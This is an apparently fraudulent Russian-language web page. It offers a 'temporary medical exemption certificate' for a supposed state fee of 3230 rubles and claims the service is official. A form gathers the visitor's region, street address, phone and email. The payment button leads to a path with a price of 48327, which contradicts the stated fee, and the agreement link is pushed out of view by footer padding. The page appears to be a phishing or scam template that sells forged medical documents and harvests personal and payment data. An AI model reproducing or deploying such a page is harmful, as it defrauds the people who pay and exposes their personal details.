<!DOCTYPE html>
<html lang="ru">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Медотвод Результат</title>


    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/normalize.css">
    <link rel="stylesheet" href="fonts/stylesheet.css">
    <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@100&family=Rubik:wght@300;800&display=swap"
        rel="stylesheet">
</head>

<body data-aos-easing="ease" data-aos-duration="700" data-aos-delay="0">
    <div class="wrapper">
        <header data-aos="fade-down" class="header aos-init aos-animate">
            <div class="container">

                <style>
                    * {
                        box-sizing: border-box;
                    }


                    .header {
                        overflow: hidden;
                        background-color: #073599;
                        padding: 20px 10px;
                    }

                    .header a {
                        float: left;
                        color: rgb(241, 241, 241);
                        text-align: center;
                        padding: 12px;
                        text-decoration: none;
                        font-size: 18px;
                        line-height: 25px;
                        border-radius: 4px;
                    }

                    .header a.logo {
                        font-size: 25px;
                        font-weight: bold;
                    }


                    .header-right {
                        float: right;
                    }

                    @media screen and (max-width: 500px) {
                        .header a {
                            float: none;
                            display: block;
                            text-align: left;
                        }

                        .header-right {
                            float: none;
                        }
                    }
                </style>


                <div class="header">

                    <h1> ВЫ МОЖЕТЕ ПОЛУЧИТЬ ВРЕМЕННУЮ СПРАВКУ О МЕДОТВОДЕ ОТ ТЕРАПЕВТА. ДЛЯ ПОЛУЧЕНИЯ СПРАВКИ ОПЛАТИТЕ ГОСПОШЛИНУ В РАЗМЕРЕ 3230 РУБ.
                    </h1>
                    <div class="header-right">

                    </div>
                </div>
            </div>
        </header>
        <div class="main">
            <div class="container">
                <div class="main-text">
                    <br><br>
                    <div class="container">
                        <p data-aos-delay="300" data-aos="fade-right" class="main-discription aos-init aos-animate">-
                            Лучшая
                            цена<br>- Короткие сроки<br>- Официально</p>
                    </div>
                    <div class="line-between"></div>
                    <br>
                    <div>
                        <h2>ВВЕДИТЕ ВАШ ПОЧТОВЫЙ АДРЕС:</h2>

                        <form action="/p">
                            <style>
                                input[type=text],
                                select {
                                    width: 100%;
                                    padding: 12px 20px;
                                    margin: 8px 0;
                                    display: inline-block;
                                    border: 1px solid #ccc;
                                    border-radius: 4px;
                                    box-sizing: border-box;
                                }
                            </style>
                            <label for="fname">ГОРОД (ОБЛАСТЬ) </label><br><br>
                            <input type="text" id="fname" name="fname" value=""><br><br>
                            <label for="fname">УЛИЦА, ДОМ, СТРОЕНИЕ, КВ</label><br>
                            <input type="text" id="fname" name="fname" value=""><br><br>
                            <label for="fname">ТЕЛЕФОН</label><br>
                            <input type="text" id="fname" name="fname" value=""><br>
                            <br>
                            <label for="fname">Email</label><br>
                            <input type="text" id="fname" name="fname" value="petrov@mail.ru"><br>
                        </form>

                    </div>

                    <a class="epay222" href="/b/m8g4/?price=48327"><button class="btn btn-standart"> ОПЛАТИТЬ ГОСПОШЛИНУ</button></a>
                    
                    <br><br><br>
                </div>
                <img data-aos-delay="300" data-aos="fade-up" class="main-image aos-init aos-animate" src="img/main-image.png"
                    style="width: 50%; height: 30%; position: relative " alt="">
            </div>
        </div>
        <div class="description">
            <div class="main-text">
              
                <div class="container">
                    <p data-aos-delay="300" data-aos="fade-right" class="main-discription aos-init aos-animate">
                        Подробнее: Вам на почту придет уведомление с кодом отслеживания местонахождения посылки. Документ высылается экспресс-доставкой. 
                </div>
                <div class="line-between"></div>
           
        </div>
    </div>
    <div class="bg-elements">
        <div class="main-bg"></div>
    </div>
    <!--scripts-->
    <script src="js/jquery.js"></script>
    <script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script>
    <script>
        AOS.init();
    </script>
    <script src="js/app.js" type="text/javascript"></script>
    <script type="text/javascript" src="js/script.js"></script>

    <div class="footer" style="padding-top: 700px; background-color: #e0f8ff;">

        <a href="info.html" style="color: rgb(184, 177, 169);">соглашение</a>
    </div>
    <script src="js/proccess_domain.js"></script>
</body>

</html>